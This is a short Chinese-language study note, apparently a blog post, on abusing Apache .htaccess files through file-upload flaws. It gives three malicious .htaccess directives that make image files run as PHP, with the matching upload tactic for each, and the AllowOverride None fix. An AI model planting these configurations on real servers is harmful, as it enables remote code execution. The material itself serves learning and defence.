【笔记】Apache分布式配置文件漏洞利用

发表于 更新于 阅读次数:

前言

针对于文件上传漏洞的Apache分布式配置文件.htaccess漏洞利用

分布式配置文件

  • 分布式配置文件.htaccess出现的时候,会覆盖httpd.conf全局配置文件

攻击

  • 如果文件上传允许上传.htaccess文件,那么就可以强制修改Apache服务器的配置

恶意配置

.htaccess
1
2
3
# 将.png文件当作.php文件解析
## 攻击方法:上传文件内容为php代码的.png文件
AddType application/x-httpd-php .png
1
2
3
# 文件中包含php关键字时,当成.php文件解析
## 攻击方法:上传文件名包含php关键字的图片文件<file_name>.php.png
AddHandler php5-script php
1
2
3
4
5
# 匹配指定文件名,当成.php文件解析
## 攻击方法:上传指定文件名的图片文件<file_name>.png
<FilesMatch "<file_name>.png">
  SetHandler application/x-http-php
</FilesMatch>

防御

  • 修改Apache配置文件中的AllowOverride,改为None不允许重写Apache根目录的文件
1
AllowOverride None

完成

参考文献

哔哩哔哩——千锋教育网络安全学院